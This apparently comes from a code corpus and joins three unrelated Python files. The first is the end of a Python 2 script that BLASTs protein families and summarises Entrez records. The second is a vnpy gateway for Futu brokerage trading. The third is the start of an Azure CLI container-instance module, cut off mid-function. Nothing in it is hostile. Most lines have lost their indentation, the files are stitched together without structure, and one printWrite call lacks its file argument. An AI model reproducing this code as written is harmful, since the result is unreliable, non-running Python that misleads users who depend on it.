# "protein", return type as GenPept flat file, return mode as xml
# More info: http://www.ncbi.nlm.nih.gov/books/NBK25499/#chapter4.EFetch
try:
handle = Entrez.efetch(db="protein", id=accessionNum, rettype="gp", retmode="xml")
except urllib2.HTTPError:
            # In case this accession number is not in the "protein" database
            # (e.g. a 3D structure such as "Chain A, Potassium Channel (Kcsa)
            # Full-Length Fold", accession "1F6G_A")
continue
#read the xml, and extract info: sequence length, domain, phylum,
# and protein name. Filter the proteins by lower cutoff length
record = Entrez.read(handle)
try:
phylum = record[0]['GBSeq_taxonomy'].split(';')[1]
except IndexError:
            # In case the xml does not contain taxonomy info, skip to the next
            # protein. Cause unknown.
continue
seqLen = int(record[0]['GBSeq_length'])
query_cover = (item.split('<td>')[3]).split('%')[0]
query_cover = int(query_cover.strip('\n'))
if query_cover < cutoff:
invalidQueue.put(1)
continue
try:
length = len(record[0]['GBSeq_other-seqids'])
for i in range(0,length):
if('gi' == record[0]['GBSeq_other-seqids'][i].split('|')[0]):
giNum = record[0]['GBSeq_other-seqids'][i].split('|')[1]
break
except:
print " {0}: Fail to get gi number".format(accessionNum)
continue
try:
fastaSeq = record[0]['GBSeq_sequence']
except:
print " {0}: Failed to record sequence".format(accessionNum)
continue
counter = counter + 1
#Record phylum and phylum name in lists
phylumQueue.put(phylum)
sequencesQueue.put(fastaSeq)
dataQueue.put([eValue,seqLen,giNum,phylum,accessionNum])
def printWrite(str, file):
print str,
file.write(str)
return
def fetch_results(proteinCode,outputseq):
global br
global lo_cutoff
print " fetching results..."
dataList = [] #stores the tuple [e-Value, sequence length, GI Number, phylum] respectively
phylumNameList = [] #list containing all names of phylum, no duplicate
phylumList = [] #list containing all names of phylum, with duplicates
sequences = [] #stores sequences of current family
avgLen = 0 #Average length of sequence
counter = 0
invalidProteins = 0
# Have to use beautiful soup to decode since the result page is not
# that nicely formatted
try:
soup = BeautifulSoup(br.response(), "html.parser")
soup = soup.prettify('utf-8')
except:
print " Trouble soupifying, reading from file directly."
soup = br.response().read()
keyLines = soup.split('Sequences with E-value WORSE than threshold')[0]
#The link containing the accession number contains a tag title "Show
# report for"
keyLines = keyLines.split('Go to alignment for ')
del keyLines[0]
with open(proteinCode + '.txt', 'w') as file:
printWrite(" {0} proteins found in this family. {1} minutes expected to finish\n".format(len(keyLines), round(0.9 * len(keyLines) / 60), -3),file)
m = mp.Manager()
dataQueue = m.Queue()
phylumQueue = m.Queue()
sequencesQueue = m.Queue()
invalidQueue = m.Queue()
jobs = []
for i in range(0,4):
p = mp.Process(target=process_data,args=(i,keyLines,dataQueue,phylumQueue,sequencesQueue,invalidQueue,lo_cutoff))
jobs.append(p)
p.start()
for item in jobs:
item.join()
maxGiLen = 0
while (not(dataQueue.empty()) or not(phylumQueue.empty()) or not(sequencesQueue.empty()) or not (invalidQueue.empty())):
if(not(dataQueue.empty())):
data = dataQueue.get()
if(maxGiLen < len(data[2])): maxGiLen = len(data[2])
dataList.append(data)
if(not(phylumQueue.empty())):
phylum = phylumQueue.get()
phylumList.append(phylum)
if phylum not in phylumNameList:
phylumNameList.append(phylum)
if(not(sequencesQueue.empty())):
sequences.append(sequencesQueue.get())
if(not(invalidQueue.empty())):
invalidProteins = invalidProteins + invalidQueue.get()
#Final outputs
total = 0
for num in dataList:
#compute total sequence length
total = total + num[1]
#divide for average
if(len(dataList) > 0):
avgLen = total/len(dataList)
else:
avgLen = 0
if(outputseq):
if not os.path.exists('./clustalout/'):
os.mkdir('./clustalout/')
f = open('./clustalout/'+proteinCode+'.flat','w')
count = 1
for item in sequences:
f.write('>{0}\n'.format(count))
f.write(item+('\n'))
count = count+1
#compute standard deviation
total = 0
for item in dataList:
total = total + (item[1]-avgLen)**2
if(len(dataList) > 0):
stddev = math.sqrt(total/len(dataList))
else:
stddev = 0
printWrite(" {0} proteins found below the cutoff. Expect {1} proteins.\n".format(invalidProteins,len(keyLines)-invalidProteins),file)
printWrite("\n \tGI number\tAccession Number\tE-Value\tLength\n",file)
for phylumName in phylumNameList:
total = phylumList.count(phylumName)
printWrite('\n {0} from phylum {1} - {2}%\n'.format(total, phylumName,(float(total)/float(len(dataList)))*100), file)
#list used for sorting
phylaData = []
counter = 0
while counter in range(len(dataList)):
if (phylumName == dataList[counter][3]):
phylaData.append(dataList[counter])
counter = counter + 1
phylaData.sort()
for item in phylaData:
printWrite(" {0:<{1}}\t{2}\t\t{3}\t{4}\n".format(item[2],abs(maxGiLen),item[4],item[0],item[1]),file)
#Average Length
printWrite("\n Alignment average length: {0} aa".format(avgLen),file)
printWrite("\n Standard Deviation: {0} aa \n\n".format(stddev),file)
fusionLen4x = 4.0 * avgLen
fusionLen3x = 3.0 * avgLen
fusionLen2x = 2.0 * avgLen
#Records index values on list
fusion4x = []
fusion3x = []
fusion2x = []
counter = 0
while counter in range(len(dataList)):
if dataList[counter][1] >= fusionLen4x:
fusion4x.append(dataList[counter])
elif dataList[counter][1] >= fusionLen3x:
fusion3x.append(dataList[counter])
elif dataList[counter][1] >= fusionLen2x:
fusion2x.append(dataList[counter])
counter = counter + 1
#Sort all fusion proteins by e-value
fusion4x.sort()
fusion3x.sort()
fusion2x.sort()
printWrite(" Potential fusion proteins...\n",file)
printWrite(" Listing GI Numbers of proteins 4x the avg length:\n",file)
for item in fusion4x:
printWrite(" {0};{1}\n".format(item[2],item[0]),file)
printWrite(" Listing GI Numbers of proteins 3x the avg length:\n",file)
for item in fusion3x:
printWrite(" {0};{1}\n".format(item[2], item[0]),file)
printWrite(" Listing GI Numbers of proteins 2x the avg length:\n",file)
for item in fusion2x:
printWrite(" {0};{1}\n".format(item[2], item[0]))
if __name__=='__main__':
#stores indicies of options
optionidx = []
#Default iterate value
numiterate=0
#boolean for outputting seq files
outputseq=0
    #If no arguments were given, output usage and exit
    if len(sys.argv)<2:
        print "Usage:",os.path.basename(__file__),"[-a<cutoff value %>] [-i<# iterations>] [-e<E-Value>] [-c (write sequences)] [family code...]"
        print "Example:",os.path.basename(__file__),"-a30 -c -e0.001 1.A.1 1.A.2 \n\t-a30, -e0.001 and -c are optional"
quit()
#find command line arg with cutoff
counter = 0
for item in sys.argv:
result = re.match('-a(\d+)',item)
result2 = re.match('-i(\d+)',item)
result3 = re.match('-e(\S+)',item)
result4 = re.match('-c',item)
if(bool(result)):
lo_cutoff = int(result.group(0).split('-a')[1])
optionidx.append(counter)
if(bool(result2)):
numiterate = int(result2.group(0).split('-i')[1])
optionidx.append(counter)
if(bool(result4)):
outputseq = 1
optionidx.append(counter)
if(bool(result3)):
eValue = result3.group(0).split('-e')[1]
optionidx.append(counter)
counter = counter+1
#begin parsing
print "Will search {0} families. Query cover cut off: {1}%.".format(len(sys.argv) - len(optionidx) - 1, lo_cutoff)
cnt = 1
familyCount = 0
while cnt in range(len(sys.argv)):
cnt = cnt + 1
if (cnt-1 in optionidx):
continue
familyCount = familyCount + 1
proteinCode = sys.argv[cnt-1]
print "\nI am working on family #{0}: {1}".format(familyCount, proteinCode)
try:
blast(proteinCode)
except:
print "Error occured on family {0}. So I skip to next family.".format(sys.argv[cnt-1])
continue
#do iterations
print "Iterating %d times:" % numiterate
for i in range(0,numiterate):
print " performing iteration %d," %(i+1)
iterate()
fetch_results(proteinCode,outputseq)
close()
print "\nProgram finished."
|
futuGateway.py
|
# encoding: UTF-8
'''
Gateway adapter for Futu Securities (富途证券).
'''
import json
from collections import OrderedDict
from threading import Thread
from time import sleep
from datetime import datetime
from copy import copy
from futuquant import (OpenQuoteContext, OpenHKTradeContext, OpenUSTradeContext,
RET_ERROR, RET_OK,
TrdEnv, TrdSide, OrderType, OrderStatus, ModifyOrderOp,
StockQuoteHandlerBase, OrderBookHandlerBase,
TradeOrderHandlerBase, TradeDealHandlerBase)
from vnpy.trader.vtGateway import *
from vnpy.trader.vtConstant import GATEWAYTYPE_INTERNATIONAL
from vnpy.trader.vtFunction import getJsonPath
# Call datetime once to make sure it is initialized
tmp = datetime.strptime('20171123', '%Y%m%d')
# Constant data mappings
productMap = OrderedDict()
productMap[PRODUCT_EQUITY] = 'STOCK'
productMap[PRODUCT_INDEX] = 'IDX'
productMap[PRODUCT_ETF] = 'ETF'
productMap[PRODUCT_WARRANT] = 'WARRANT'
productMap[PRODUCT_BOND] = 'BOND'
directionMap = {}
directionMap[DIRECTION_LONG] = TrdSide.BUY
directionMap[DIRECTION_SHORT] = TrdSide.SELL
directionMapReverse = {v:k for k,v in directionMap.items()}
statusMapReverse = {}
statusMapReverse[OrderStatus.NONE] = STATUS_UNKNOWN
statusMapReverse[OrderStatus.SUBMITTED] = STATUS_NOTTRADED
statusMapReverse[OrderStatus.FILLED_PART] = STATUS_PARTTRADED
statusMapReverse[OrderStatus.FILLED_ALL] = STATUS_ALLTRADED
statusMapReverse[OrderStatus.CANCELLED_ALL] = STATUS_CANCELLED
statusMapReverse[OrderStatus.CANCELLED_PART] = STATUS_CANCELLED
statusMapReverse[OrderStatus.SUBMIT_FAILED] = STATUS_REJECTED
statusMapReverse[OrderStatus.FAILED] = STATUS_REJECTED
statusMapReverse[OrderStatus.DISABLED] = STATUS_CANCELLED
########################################################################
class FutuGateway(VtGateway):
"""富途接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='FUTU'):
"""Constructor"""
super(FutuGateway, self).__init__(eventEngine, gatewayName)
self.quoteCtx = None
self.tradeCtx = None
self.host = ''
        self.port = 0
self.market = ''
self.password = ''
        self.env = TrdEnv.SIMULATE  # default to simulated (paper) trading
self.fileName = self.gatewayName + '_connect.json'
self.filePath = getJsonPath(self.fileName, __file__)
self.tickDict = {}
        self.tradeSet = set()  # set of processed trade IDs, to avoid duplicate pushes
self.qryEnabled = True
self.qryThread = Thread(target=self.qryData)
#----------------------------------------------------------------------
def writeLog(self, content):
"""输出日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
self.onLog(log)
#----------------------------------------------------------------------
def writeError(self, code, msg):
"""输出错误"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorID = code
error.errorMsg = msg
self.onError(error)
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入配置
try:
f = open(self.filePath)
setting = json.load(f)
self.host = setting['host']
self.port = setting['port']
self.market = setting['market']
self.password = setting['password']
self.env = setting['env']
except:
self.writeLog(u'载入配置文件出错')
return
self.connectQuote()
self.connectTrade()
self.qryThread.start()
#----------------------------------------------------------------------
def qryData(self):
"""初始化时查询数据"""
# 等待2秒保证行情和交易接口启动完成
sleep(2.0)
# 查询合约、成交、委托、持仓、账户
self.qryContract()
self.qryTrade()
self.qryOrder()
self.qryPosition()
self.qryAccount()
        # Start the polling query loop
self.initQuery()
#----------------------------------------------------------------------
def connectQuote(self):
"""连接行情功能"""
self.quoteCtx = OpenQuoteContext(self.host, self.port)
# 继承实现处理器类
class QuoteHandler(StockQuoteHandlerBase):
"""报价处理器"""
gateway = self # 缓存Gateway对象
def on_recv_rsp(self, rsp_str):
ret_code, content = super(QuoteHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processQuote(content)
return RET_OK, content
class OrderBookHandler(OrderBookHandlerBase):
"""订单簿处理器"""
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderBookHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processOrderBook(content)
return RET_OK, content
        # Register the callback handler objects
        self.quoteCtx.set_handler(QuoteHandler())
        self.quoteCtx.set_handler(OrderBookHandler())
        # Start the quote interface
self.quoteCtx.start()
self.writeLog(u'行情接口连接成功')
#----------------------------------------------------------------------
def connectTrade(self):
"""连接交易功能"""
# 连接交易接口
if self.market == 'US':
self.tradeCtx = OpenUSTradeContext(self.host, self.port)
else:
self.tradeCtx = OpenHKTradeContext(self.host, self.port)
        # Subclass and implement the handler classes
        class OrderHandler(TradeOrderHandlerBase):
            """Order handler"""
            gateway = self  # cache the gateway object
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processOrder(content)
return RET_OK, content
class DealHandler(TradeDealHandlerBase):
"""订单簿处理器"""
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(DealHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processDeal(content)
return RET_OK, content
        # Unlocking is only required for live trading of HK stocks
code, data = self.tradeCtx.unlock_trade(self.password)
if code == RET_OK:
self.writeLog(u'交易接口解锁成功')
else:
self.writeLog(u'交易接口解锁失败,原因:%s' %data)
        # Register the callback handler objects
self.tradeCtx.set_handler(OrderHandler())
self.tradeCtx.set_handler(DealHandler())
        # Start the trade interface
self.tradeCtx.start()
self.writeLog(u'交易接口连接成功')
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
for data_type in ['QUOTE', 'ORDER_BOOK']:
code, data = self.quoteCtx.subscribe(subscribeReq.symbol, data_type, True)
if code:
self.writeError(code, u'订阅行情失败:%s' %data)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
side = directionMap[orderReq.direction]
priceType = OrderType.NORMAL # 只支持限价单
# 设置价格调整模式为向内调整(即买入调整后价格比原始价格低)
if orderReq.direction == DIRECTION_LONG:
adjustLimit = 0.05
else:
adjustLimit = -0.05
code, data = self.tradeCtx.place_order(orderReq.price, orderReq.volume,
orderReq.symbol, side, priceType,
trd_env=self.env,
adjust_limit=adjustLimit)
if code:
self.writeError(code, u'委托失败:%s' %data)
return ''
for ix, row in data.iterrows():
orderID = str(row['order_id'])
vtOrderID = '.'.join([self.gatewayName, orderID])
return vtOrderID
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
code, data = self.tradeCtx.modify_order(ModifyOrderOp.CANCEL, cancelOrderReq.orderID,
0, 0, trd_env=self.env)
if code:
self.writeError(code, u'撤单失败:%s' %data)
return
#----------------------------------------------------------------------
def qryContract(self):
"""查询合约"""
for vtProductClass, product in productMap.items():
code, data = self.quoteCtx.get_stock_basicinfo(self.market, product)
if code:
self.writeError(code, u'查询合约信息失败:%s' %data)
return
for ix, row in data.iterrows():
contract = VtContractData()
contract.gatewayName = self.gatewayName
contract.symbol = row['code']
contract.vtSymbol = contract.symbol
contract.name = row['name']
contract.productClass = vtProductClass
contract.size = int(row['lot_size'])
contract.priceTick = 0.001
self.onContract(contract)
self.writeLog(u'合约信息查询成功')
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
code, data = self.tradeCtx.accinfo_query(trd_env=self.env, acc_id=0)
if code:
self.writeError(code, u'查询账户资金失败:%s' %data)
return
for ix, row in data.iterrows():
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = '%s_%s' %(self.gatewayName, self.market)
account.vtAccountID = '.'.join([self.gatewayName, account.accountID])
account.balance = float(row['total_assets'])
account.available = float(row['avl_withdrawal_cash'])
self.onAccount(account)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
code, data = self.tradeCtx.position_list_query(trd_env=self.env, acc_id=0)
if code:
self.writeError(code, u'查询持仓失败:%s' %data)
return
for ix, row in data.iterrows():
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = row['code']
pos.vtSymbol = pos.symbol
pos.direction = DIRECTION_LONG
pos.vtPositionName = '.'.join([pos.vtSymbol, pos.direction])
pos.position = float(row['qty'])
pos.price = float(row['cost_price'])
pos.positionProfit = float(row['pl_val'])
pos.frozen = float(row['qty']) - float(row['can_sell_qty'])
if pos.price < 0: pos.price = 0
if pos.positionProfit > 100000000: pos.positionProfit = 0
self.onPosition(pos)
#----------------------------------------------------------------------
def qryOrder(self):
"""查询委托"""
code, data = self.tradeCtx.order_list_query("", trd_env=self.env)
if code:
self.writeError(code, u'查询委托失败:%s' %data)
return
self.processOrder(data)
self.writeLog(u'委托查询成功')
#----------------------------------------------------------------------
def qryTrade(self):
"""查询成交"""
code, data = self.tradeCtx.deal_list_query(self.env)
if code:
self.writeError(code, u'查询成交失败:%s' %data)
return
self.processDeal(data)
self.writeLog(u'成交查询成功')
#----------------------------------------------------------------------
def close(self):
"""关闭"""
if self.quoteCtx:
self.quoteCtx.close()
if self.tradeCtx:
self.tradeCtx.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount, self.qryPosition]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
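        # Rough cadence sketch (assuming the event engine emits EVENT_TIMER about
        # once per second, the usual vnpy default): one query fires every
        # qryTrigger + 1 ticks, so each of the two functions above runs roughly
        # every (qryTrigger + 1) * len(qryFunctionList) = 6 seconds.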
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
#----------------------------------------------------------------------
def processQuote(self, data):
"""报价推送"""
for ix, row in data.iterrows():
symbol = row['code']
tick = self.tickDict.get(symbol, None)
if not tick:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = tick.symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
tick.date = row['data_date'].replace('-', '')
tick.time = row['data_time']
tick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S')
tick.openPrice = row['open_price']
tick.highPrice = row['high_price']
tick.lowPrice = row['low_price']
tick.preClosePrice = row['prev_close_price']
tick.lastPrice = row['last_price']
tick.volume = row['volume']
if 'price_spread' in row:
spread = row['price_spread']
tick.upperLimit = tick.lastPrice + spread * 10
tick.lowerLimit = tick.lastPrice - spread * 10
newTick = copy(tick)
self.onTick(newTick)
#----------------------------------------------------------------------
def processOrderBook(self, data):
"""订单簿推送"""
symbol = data['code']
tick = self.tickDict.get(symbol, None)
if not tick:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = tick.symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
d = tick.__dict__
for i in range(5):
bidData = data['Bid'][i]
askData = data['Ask'][i]
n = i + 1
d['bidPrice%s' %n] = bidData[0]
d['bidVolume%s' %n] = bidData[1]
d['askPrice%s' %n] = askData[0]
d['askVolume%s' %n] = askData[1]
if tick.datetime:
newTick = copy(tick)
self.onTick(newTick)
#----------------------------------------------------------------------
def processOrder(self, data):
"""处理委托推送"""
for ix, row in data.iterrows():
# 如果状态是已经删除,则直接忽略
if row['order_status'] == OrderStatus.DELETED:
continue
print(row['order_status'])
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = row['code']
order.vtSymbol = order.symbol
order.orderID = str(row['order_id'])
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(row['price'])
order.totalVolume = float(row['qty'])
order.tradedVolume = float(row['dealt_qty'])
order.orderTime = row['create_time'].split(' ')[-1]
order.status = statusMapReverse.get(row['order_status'], STATUS_UNKNOWN)
order.direction = directionMapReverse[row['trd_side']]
self.onOrder(order)
#----------------------------------------------------------------------
def processDeal(self, data):
"""处理成交推送"""
for ix, row in data.iterrows():
tradeID = str(row['deal_id'])
if tradeID in self.tradeSet:
continue
self.tradeSet.add(tradeID)
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = row['code']
trade.vtSymbol = trade.symbol
trade.tradeID = tradeID
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = row['order_id']
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.price = float(row['price'])
trade.volume = float(row['qty'])
trade.direction = directionMapReverse[row['trd_side']]
trade.tradeTime = row['create_time'].split(' ')[-1]
self.onTrade(trade)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-few-public-methods,no-self-use,too-many-locals,line-too-long,unused-argument
import errno
try:
import msvcrt
except ImportError:
# Not supported for Linux machines.
pass
import platform
import select
import shlex
import signal
import sys
import threading
import time
try:
import termios
import tty
except ImportError:
# Not supported for Windows machines.
pass
import websocket
import yaml
from knack.log import get_logger
from knack.prompting import prompt_pass, prompt, NoTTYException
from knack.util import CLIError
from azure.mgmt.containerinstance.models import (AzureFileVolume, Container, ContainerGroup, ContainerGroupNetworkProtocol,
ContainerPort, ImageRegistryCredential, IpAddress, Port, ResourceRequests,
ResourceRequirements, Volume, VolumeMount, ContainerExecRequestTerminalSize,
GitRepoVolume, LogAnalytics, ContainerGroupDiagnostics, ContainerGroupNetworkProfile,
ContainerGroupIpAddressType, ResourceIdentityType, ContainerGroupIdentity)
from azure.cli.core.util import sdk_no_wait
from ._client_factory import (cf_container_groups, cf_container, cf_log_analytics_workspace,
cf_log_analytics_workspace_shared_keys, cf_resource, cf_network)
logger = get_logger(__name__)
WINDOWS_NAME = 'Windows'
SERVER_DELIMITER = '.'
ACR_SERVER_DELIMITER = '.azurecr.io'
AZURE_FILE_VOLUME_NAME = 'azurefile'
SECRETS_VOLUME_NAME = 'secrets'
GITREPO_VOLUME_NAME = 'gitrepo'
MSI_LOCAL_ID = '[system]'
def list_containers(client, resource_group_name=None):
"""List all container groups in a resource group. """
if resource_group_name is None:
return client.list()
return client.list_by_resource_group(resource_group_name)
def get_container(client, resource_group_name, name):
"""Show details of a container group. """
return client.get(resource_group_name, name)
def delete_container(client, resource_group_name, name, **kwargs):
"""Delete a container group. """
return client.delete(resource_group_name, name)
# pylint: disable=too-many-statements
def create_container(cmd,
resource_group_name,
name=None,
image=None,
location=None,
cpu=1,
memory=1.5,
restart_policy='Always',
ports=None,
protocol=None,
os_type='Linux',
ip_address=None,
dns_name_label=None,
command_line=None,
environment_variables=None,
secure_environment_variables=None,
registry_login_server=None,
registry_username=None,
registry_password=None,
azure_file_volume_share_name=None,
azure_file_volume_account_name=None,
azure_file_volume_account_key=None,
azure_file_volume_mount_path=None,
log_analytics_workspace=None,
log_analytics_workspace_key=None,
vnet=None,
vnet_name=None,
vnet_address_prefix='10.0.0.0/16',
subnet=None,
subnet_address_prefix='10.0.0.0/24',
network_profile=None,
gitrepo_url=None,
gitrepo_dir='.',
gitrepo_revision=None,
gitrepo_mount_path=None,
secrets=None,
secrets_mount_path=None,
file=None,
assign_identity=None,
identity_scope=None,
identity_role='Contributor',
no_wait=False):
"""Create a container group. """
if file:
return _create_update_from_file(cmd.cli_ctx, resource_group_name, name, location, file, no_wait)
if not name:
raise CLIError("error: the --name/-n argument is required unless specified with a passed in file.")
if not image:
raise CLIError("error: the --image argument is required unless specified with a passed in file.")
ports = ports or [80]
protocol = protocol or ContainerGroupNetworkProtocol.tcp
container_resource_requirements = _create_resource_requirements(cpu=cpu, memory=memory)
image_registry_credentials = _create_image_registry_credentials(registry_login_server=registry_login_server,
registry_username=registry_username,
registry_password=registry_password,
image=image)
command = shlex.split(command_line) if command_line else None
volumes = []
mounts = []
azure_file_volume = _create_azure_file_volume(azure_file_volume_share_name=azure_file_volume_share_name,
azure_file_volume_account_name=azure_file_volume_account_name,
azure_file_volume_account_key=azure_file_volume_account_key)
azure_file_volume_mount = _create_azure_file_volume_mount(azure_file_volume=azure_file_volume,
azure_file_volume_mount_path=azure_file_volume_mount_path)
if azure_file_volume:
volumes.append(azure_file_volume)
mounts.append(azure_file_volume_mount)
secrets_volume = _create_secrets_volume(secrets)
secrets_volume_mount = _create_secrets_volume_mount(secrets_volume=secrets_volume,
secrets_mount_path=secrets_mount_path)
if secrets_volume:
volumes.append(secrets_volume)
mounts.append(secrets_volume_mount)
diagnostics = None
tags = {}
if log_analytics_workspace and log_analytics_workspace_key:
log_analytics = LogAnalytics(
workspace_id=log_analytics_workspace, workspace_key=log_analytics_workspace_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics
)
elif log_analytics_workspace and not log_analytics_workspace_key:
diagnostics, tags = _get_diagnostics_from_workspace(
cmd.cli_ctx, log_analytics_workspace)
if not diagnostics:
raise CLIError('Log Analytics workspace "' + log_analytics_workspace + '" not found.')
elif not log_analytics_workspace and log_analytics_workspace_key:
raise CLIError('"--log-analytics-workspace-key" requires "--log-analytics-workspace".')
gitrepo_volume = _create_gitrepo_volume(gitrepo_url=gitrepo_url, gitrepo_dir=gitrepo_dir, gitrepo_revision=gitrepo_revision)
gitrepo_volume_mount = _create_gitrepo_volume_mount(gitrepo_volume=gitrepo_volume, gitrepo_mount_path=gitrepo_mount_path)
if gitrepo_volume:
volumes.append(gitrepo_volume)
mounts.append(gitrepo_volume_mount)
# Concatenate secure and standard environment variables
if environment_variables and secure_environment_variables:
environment_variables = environment_variables + secure_environment_variables
else:
environment_variables = environment_variables or secure_environment_variables
identity = None
if assign_identity is not None:
identity = _build_identities_info(assign_identity)
# Set up VNET, subnet and network profile if needed
if subnet and not network_profile:
network_profile = _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix)
cg_network_profile = None
if network_profile:
cg_network_profile = ContainerGroupNetworkProfile(id=network_profile)
cgroup_ip_address = _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile)
container = Container(name=name,
image=image,
resources=container_resource_requirements,
command=command,
ports=[ContainerPort(
port=p, protocol=protocol) for p in ports] if cgroup_ip_address else None,
environment_variables=environment_variables,
volume_mounts=mounts or None)
cgroup = ContainerGroup(location=location,
identity=identity,
containers=[container],
os_type=os_type,
restart_policy=restart_policy,
ip_address=cgroup_ip_address,
image_registry_credentials=image_registry_credentials,
volumes=volumes or None,
network_profile=cg_network_profile,
diagnostics=diagnostics,
tags=tags)
container_group_client = cf_container_groups(cmd.cli_ctx)
lro = sdk_no_wait(no_wait, container_group_client.create_or_update, resource_group_name,
name, cgroup)
if assign_identity is not None and identity_scope:
from azure.cli.core.commands.arm import assign_identity
cg = container_group_client.get(resource_group_name, name)
assign_identity(cmd.cli_ctx, lambda: cg, lambda cg: cg, identity_role, identity_scope)
return lro
def _build_identities_info(identities):
identities = identities or []
identity_type = ResourceIdentityType.none
if not identities or MSI_LOCAL_ID in identities:
identity_type = ResourceIdentityType.system_assigned
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities and identity_type == ResourceIdentityType.system_assigned:
identity_type = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_type = ResourceIdentityType.user_assigned
identity = ContainerGroupIdentity(type=identity_type)
if external_identities:
identity.user_assigned_identities = {e: {} for e in external_identities}
return identity
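# Illustrative mappings for _build_identities_info (identity resource IDs are
# hypothetical):
#   [] or None                                     -> SystemAssigned (default)
#   ['[system]']                                   -> SystemAssigned
#   ['/subscriptions/.../myIdentity']              -> UserAssigned
#   ['[system]', '/subscriptions/.../myIdentity']  -> SystemAssigned, UserAssigned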
def _get_resource(client, resource_group_name, *subresources):
from msrestazure.azure_exceptions import CloudError
try:
resource = client.get(resource_group_name, *subresources)
return resource
except CloudError as ex:
if ex.error.error == "NotFound" or ex.error.error == "ResourceNotFound":
return None
raise
def _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix):
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id, is_valid_resource_id
aci_delegation_service_name = "Microsoft.ContainerInstance/containerGroups"
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
aci_delegation = Delegation(
name=aci_delegation_service_name,
service_name=aci_delegation_service_name
)
ncf = cf_network(cmd.cli_ctx)
vnet_name = vnet
subnet_name = subnet
if is_valid_resource_id(subnet):
parsed_subnet_id = parse_resource_id(subnet)
subnet_name = parsed_subnet_id['resource_name']
vnet_name = parsed_subnet_id['name']
resource_group_name = parsed_subnet_id['resource_group']
elif is_valid_resource_id(vnet):
parsed_vnet_id = parse_resource_id(vnet)
vnet_name = parsed_vnet_id['resource_name']
resource_group_name = parsed_vnet_id['resource_group']
default_network_profile_name = "aci-network-profile-{}-{}".format(vnet_name, subnet_name)
subnet = _get_resource(ncf.subnets, resource_group_name, vnet_name, subnet_name)
# For an existing subnet, validate and add delegation if needed
if subnet:
logger.info('Using existing subnet "%s" in resource group "%s"', subnet.name, resource_group_name)
for sal in (subnet.service_association_links or []):
if sal.linked_resource_type != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing service association links other than {}.".format(aci_delegation_service_name))
if not subnet.delegations:
logger.info('Adding ACI delegation to the existing subnet.')
subnet.delegations = [aci_delegation]
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
else:
for delegation in subnet.delegations:
if delegation.service_name != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing delegations other than {}".format(aci_delegation_service_name))
network_profile = _get_resource(ncf.network_profiles, resource_group_name, default_network_profile_name)
if network_profile:
logger.info('Using existing network profile "%s"', default_network_profile_name)
return network_profile.id
# Create new subnet and Vnet if not exists
else:
Subnet, VirtualNetwork, AddressSpace = cmd.get_models('Subnet', 'VirtualNetwork',
'AddressSpace', resource_type=ResourceType.MGMT_NETWORK)
